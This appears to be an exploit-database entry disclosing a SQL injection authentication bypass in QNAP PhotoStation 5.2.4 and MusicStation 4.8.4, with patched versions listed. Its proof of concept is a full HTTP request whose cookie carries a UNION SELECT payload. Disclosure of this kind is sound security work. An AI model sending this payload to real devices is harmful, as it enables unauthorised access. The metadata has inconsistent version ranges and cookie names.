Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass

vendor:

PhotoStation and MusicStation

by:

Kacper Szurek

CVSS

HIGH

SQL Injection

CWE

Product Name: PhotoStation and MusicStation

Affected Version From: 5.2.4

Affected Version To: 4.8.4

Patch Exists: YES

Related CWE: N/A

CPE: a:qnap:photostation:5.2.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2017

Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass

The vulnerability exists due to the lack of proper sanitization of the `$_COOKIE[STATIONSID]` parameter, which is used inside a SQL statement. An attacker can send a specially crafted HTTP request with a malicious cookie value to bypass authentication and gain access to the application.

Mitigation:

Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)

Source

Exploit-DB raw data:

# Exploit QNAP PhotoStation 5.2.4 and MusicStation 4.8.4 Authentication Bypass
# Date: 10.05.2017
# Software Link: https://www.qnap.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: web
  
1. Description
 
`$_COOKIE[STATIONSID]` is not escaped and then used inside SQL statement.

https://security.szurek.pl/qnap-photostation-524-musicstation-484-authentication-bypass.html

2. Proof of Concept

GET /photo/api/dmc.php HTTP/1.1
Host: qnap.host:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: QMS_SID=' UNION SELECT 9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999 -- a
Connection: close

3. Fix

Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)